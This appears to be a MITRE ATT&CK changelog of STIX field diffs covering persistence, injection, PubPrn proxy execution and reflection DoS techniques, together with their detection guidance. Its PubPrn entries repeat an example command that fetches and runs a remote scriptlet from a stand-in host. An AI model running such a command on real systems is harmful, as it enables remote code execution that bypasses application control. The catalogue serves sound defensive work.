| external_references | {'source_name': 'Sixdub PowerPick Jan 2016', 'description': 'Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.', 'url': 'http://www.sixdub.net/?p=367'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_data_sources | Module: Module Load |
| Description |
|---|
Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.
[PowerShell](https://attack.mitre.org/techniques/T1059/001) supports several profiles depending on the user or host program. For example, there can be different profiles for [PowerShell](https://attack.mitre.org/techniques/T1059/001) host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)
Adversaries may modify these profiles to include arbitrary commands, functions, modules, and/or [PowerShell](https://attack.mitre.org/techniques/T1059/001) drives to gain persistence. Every time a user opens a [PowerShell](https://attack.mitre.org/techniques/T1059/001) session the modified script will be executed unless the -NoProfile flag is used when it is launched. (Citation: ESET Turla PowerShell May 2019)
An adversary may also be able to escalate privileges if a script in a PowerShell profile is loaded and executed by an account with higher privileges, such as a domain administrator. (Citation: Wits End and Shady PowerShell Profiles) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 21:31:31.082000+00:00 | 2022-02-08 16:39:08.851000+00:00 |
| x_mitre_data_sources[0] | Process: Process Creation | File: File Modification |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[2] | File: File Modification | Command: Command Execution |
| x_mitre_data_sources[3] | File: File Creation | Process: Process Creation |
| x_mitre_detection | Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include:
* $PsHome\Profile.ps1
* $PsHome\Microsoft.{HostProgram}_profile.ps1
* $Home\My Documents\PowerShell\Profile.ps1
* $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. |
Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:
* $PsHome\Profile.ps1
* $PsHome\Microsoft.{HostProgram}_profile.ps1
* $Home\\\[My ]Documents\PowerShell\Profile.ps1
* $Home\\\[My ]Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft Profiles', 'description': 'Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.', 'url': 'https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles'} | |
| x_mitre_contributors | Matthew Green |
| Description |
|---|
| Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting) Adversaries may overwrite data in boot drivers or firmware such as BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) to persist on systems at a layer below the operating system. This can be particularly difficult to detect as malware at this level will not be detected by host software-based defenses. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-22 16:35:54.740000+00:00 | 2022-04-19 02:50:42.074000+00:00 |
| external_references[1]['source_name'] | Wikipedia Booting | ITWorld Hard Disk Health Dec 2014 |
| external_references[1]['description'] | Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Booting | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
| external_references[2]['source_name'] | ITWorld Hard Disk Health Dec 2014 | Wikipedia Booting |
| external_references[2]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Wikipedia. (n.d.). Booting. Retrieved November 13, 2019. |
| external_references[2]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://en.wikipedia.org/wiki/Booting |
| x_mitre_data_sources[0] | Command: Command Execution | Driver: Driver Metadata |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Process: OS API Execution |
| x_mitre_data_sources[2] | Firmware: Firmware Modification | Drive: Drive Modification |
| x_mitre_data_sources[3] | Driver: Driver Metadata | Command: Command Execution |
| x_mitre_data_sources[4] | Process: OS API Execution | Network Traffic: Network Connection Creation |
| x_mitre_data_sources[5] | Drive: Drive Modification | Firmware: Firmware Modification |
| x_mitre_detection | Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation. (Citation: ITWorld Hard Disk Health Dec 2014) | Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. Disk check, forensic utilities, and data from device drivers (i.e. processes and API calls) may reveal anomalies that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_platforms | macOS |
| Description |
|---|
Adversaries may inject malicious code into suspended and hollowed processes in order to evade process-based defenses. Process hollowing is a method of executing arbitrary code in the address space of a separate live process.
Process hollowing is commonly performed by creating a process in a suspended state then unmapping/hollowing its memory, which can then be replaced with malicious code. A victim process can be created with native Windows API calls such as CreateProcess, which includes a flag to suspend the processes primary thread. At this point the process can be unmapped using APIs calls such as ZwUnmapViewOfSection or NtUnmapViewOfSection before being written to, realigned to the injected code, and resumed via VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: Leitch Hollowing)(Citation: Elastic Process Injection July 2017)
This is very similar to [Thread Local Storage](https://attack.mitre.org/techniques/T1055/005) but creates a new process rather than targeting an existing process. This behavior will likely not result in elevated privileges since the injected process was spawned from (and thus inherits the security context) of the injecting process. However, execution via process hollowing may also evade detection from security products since the execution is masked under a legitimate process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:30:14.640000+00:00 | 2021-11-29 17:22:32.704000+00:00 |
| x_mitre_data_sources[0] | Process: Process Modification | Process: Process Access |
| x_mitre_data_sources[2] | Process: Process Access | Process: Process Modification |
| x_mitre_detection | Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017)
Processing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019)
Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Nviso Spoof Command Line 2020', 'description': 'Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.', 'url': 'https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/'} | |
| external_references | {'source_name': 'Mandiant Endpoint Evading 2019', 'description': 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.', 'url': 'https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode'} |
| Description |
|---|
| Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | |
| external_references | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | |
| external_references | CAPEC-640 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-640 | |
| external_references | https://www.gnu.org/software/acct/ | |
| external_references | Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 12:30:14.852000+00:00 | 2022-10-18 20:58:50.105000+00:00 |
| external_references[1]['source_name'] | capec | GNU Acct |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/640.html | https://www.gnu.org/software/acct/ |
| external_references[3]['source_name'] | ArtOfMemoryForensics | RHEL auditd |
| external_references[3]['description'] | Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017. | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. |
| external_references[4]['source_name'] | GNU Acct | ArtOfMemoryForensics |
| external_references[4]['description'] | GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017. | Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017. |
| external_references[5]['source_name'] | RHEL auditd | Microsoft Sysmon v6 May 2017 |
| external_references[5]['description'] | Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017. | Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017. |
| external_references[5]['url'] | https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing | https://docs.microsoft.com/sysinternals/downloads/sysmon |
| external_references[7]['source_name'] | Microsoft Sysmon v6 May 2017 | capec |
| external_references[7]['url'] | https://docs.microsoft.com/sysinternals/downloads/sysmon | https://capec.mitre.org/data/definitions/640.html |
| x_mitre_data_sources[1] | Module: Module Load | File: File Metadata |
| x_mitre_data_sources[6] | File: File Modification | Module: Module Load |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification | |
| x_mitre_data_sources | Process: Process Metadata |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Metadata |
| Old Description | New Description |
|---|---|
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn) Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script. In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-09-01 00:57:01.161000+00:00 | 2022-04-18 14:55:35.817000+00:00 |
| description | Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S). |
| x_mitre_version | 1.1 | 2.0 |
| Old Description | New Description |
|---|---|
Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence). |
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 19:51:37.795000+00:00 | 2022-04-19 23:46:56.443000+00:00 |
| description | Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist.
An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence). |
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in. |
| external_references[1]['source_name'] | Methods of Mac Malware Persistence | Re-Open windows on Mac |
| external_references[1]['description'] | Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017. | Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017. |
| external_references[1]['url'] | https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf | https://support.apple.com/en-us/HT204005 |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Methods of Mac Malware Persistence', 'description': 'Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'} | |
| external_references | {'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'} |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) | Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-29 16:13:53.747000+00:00 | 2022-03-25 20:05:38.883000+00:00 |
| description | Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) | Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network. Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018) |
| x_mitre_version | 1.2 | 1.3 |
| Description |
|---|
| Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-11-01 18:09:09.670000+00:00 | 2022-04-21 16:21:09.679000+00:00 |
| external_references[1]['source_name'] | Introducing Donut | 00sec Droppers |
| external_references[1]['description'] | The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. | 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. |
| external_references[1]['url'] | https://thewover.github.io/Introducing-Donut/ | https://0x00sec.org/t/super-stealthy-droppers/3715 |
| external_references[3]['source_name'] | Stuart ELF Memory | Mandiant BYOL |
| external_references[3]['description'] | Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. |
| external_references[3]['url'] | https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique |
| external_references[4]['source_name'] | 00sec Droppers | S1 Old Rat New Tricks |
| external_references[4]['description'] | 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. | Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. |
| external_references[4]['url'] | https://0x00sec.org/t/super-stealthy-droppers/3715 | https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ |
| external_references[5]['source_name'] | Mandiant BYOL | MDSec Detecting DOTNET |
| external_references[5]['description'] | Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. | MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. |
| external_references[5]['url'] | https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique | https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ |
| external_references[7]['source_name'] | S1 Old Rat New Tricks | Stuart ELF Memory |
| external_references[7]['description'] | Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. | Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. |
